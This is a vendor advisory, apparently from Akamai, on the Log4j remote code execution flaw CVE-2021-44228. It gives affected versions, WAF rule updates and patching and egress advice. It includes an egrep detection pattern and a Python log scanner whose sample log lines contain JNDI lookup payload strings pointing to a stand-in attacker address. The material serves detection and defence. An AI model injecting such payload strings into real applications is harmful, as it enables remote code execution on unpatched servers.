
CVE-2021-44228 - Zero Day Vulnerability in Apache Log4j That Allows Remote Code Execution (RCE)

Written by

Akamai

December 11, 2021

A critical unauthenticated remote code execution (RCE) vulnerability (CVE-2021-44228) has been reported in Log4j, an open source logging library. Akamai has been working directly with customers to deploy web application firewall (WAF) rules over the past 24 hours to mitigate the exposure. Log4j is incorporated into many popular frameworks, making the impact widespread. The vulnerability is actively being exploited, and when abused allows a threat actor to execute arbitrary code on systems running apps that contain the library.

The vulnerability impacts multiple versions of Log4j and the applications that depend on it (these include Apache Struts2, Apache Solr, Apache Druid, Apache Flink and many others). Application administrators and developers are advised to verify which applications use the Log4j package and, if the package version is in the vulnerable range (Log4j versions 2.0 through 2.14.1), update to version 2.16.0 or later as soon as possible. The latest version can already be found on the Log4j download page.

Akamai has now deployed an update to our existing Apache rule to include mitigation for this Zero Day CVE. This includes updating rule 3000014 for Akamai’s Kona Rule Set or Adaptive Security Engine (for customers using the Automated Attack Group engine, we have updated the Command Injection group). These are the engines used in Akamai’s Kona Site Defender, Web Application Protector, and App & API Protector products. Any customers who currently have those rules (or attack groups) activated in DENY mode will receive automatic in-line protection for the following protection engines and versions:

  • Kona Rule Set - Any version dated October 29, 2019 or later

  • Automated Attack Groups - Any version

  • Adaptive Security Engine - Any version

Servers hosting internet-facing applications may already be compromised. On many systems, the following command can surface exploit attempts recorded in logs and help identify Indicators of Compromise:

  sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns)://' /var/log
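As an added example (not code from the Akamai post), the following Python script applies the same pattern as the egrep command above to a few constructed sample log lines and checks a Log4j version string against the 2.0 through 2.14.1 range and the 2.16.0 baseline named earlier; the log lines and the 203.0.113.5 address are constructed placeholders.

```python
import re

# Same pattern as the egrep command above: a JNDI lookup over ldap/ldaps/rmi/dns.
JNDI_LOOKUP = re.compile(r"\$\{jndi:(ldap[s]?|rmi|dns)://", re.IGNORECASE)

# Constructed sample access-log lines (not from any real system). 203.0.113.5 is a
# documentation-only address standing in for the host a lookup would reach out to.
SAMPLE_LOG = """\
10.0.0.7 - - [10/Dec/2021:18:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:18:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"
10.0.0.9 - - [10/Dec/2021:18:01:06 +0000] "GET /login HTTP/1.1" 404 0 "-" "${JNDI:RMI://203.0.113.5:1099/b}"
10.0.0.3 - - [10/Dec/2021:18:02:11 +0000] "POST /api HTTP/1.1" 200 88 "-" "curl/7.68.0"
"""


def find_jndi_attempts(log_text):
    """Return (line_number, scheme, line) for every line holding a JNDI lookup string."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        match = JNDI_LOOKUP.search(line)
        if match:
            hits.append((number, match.group(1).lower(), line))
    return hits


def parse_version(version):
    """Turn '2.14.1' into (2, 14, 1); non-numeric suffixes and missing parts count as zero."""
    parts = []
    for piece in version.strip().split("."):
        digits = re.match(r"\d+", piece)
        parts.append(int(digits.group(0)) if digits else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_in_vulnerable_range(version):
    """True for Log4j 2.0 through 2.14.1, the range the advisory names."""
    return (2, 0, 0) <= parse_version(version) <= (2, 14, 1)


def meets_recommended_version(version):
    """True for 2.16.0 or later, the version the advisory says to update to."""
    return parse_version(version) >= (2, 16, 0)


if __name__ == "__main__":
    for number, scheme, line in find_jndi_attempts(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup via {scheme}: {line}")
    for v in ("2.0", "2.14.1", "2.16.0"):
        print(v, "in vulnerable range" if is_in_vulnerable_range(v) else "outside vulnerable range")
```

Pointing `find_jndi_attempts` at real log files turns up the same lines the egrep command does, with the scheme extracted for triage.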

We recommend that all users of Log4j 2.0 through 2.14.1 update as soon as possible; where that is not possible, the potentially vulnerable machines should limit outbound access as much as possible. Multiple outbound protocols can be used to exploit vulnerable systems, so blocking specific outbound ports or hosts may not be sufficient.

Akamai customers with Guardicore Centra, now part of the Akamai security suite, can leverage Centra process-level visibility to identify all Java-based applications in their network that are potentially at risk. Customers can then map their exposure and assess their risk level (e.g., internet-facing services, infrastructure services exposed to the entire data center, local applications serving limited users and machines) and apply fast-response risk-reduction segmentation rules until a patch can be deployed.
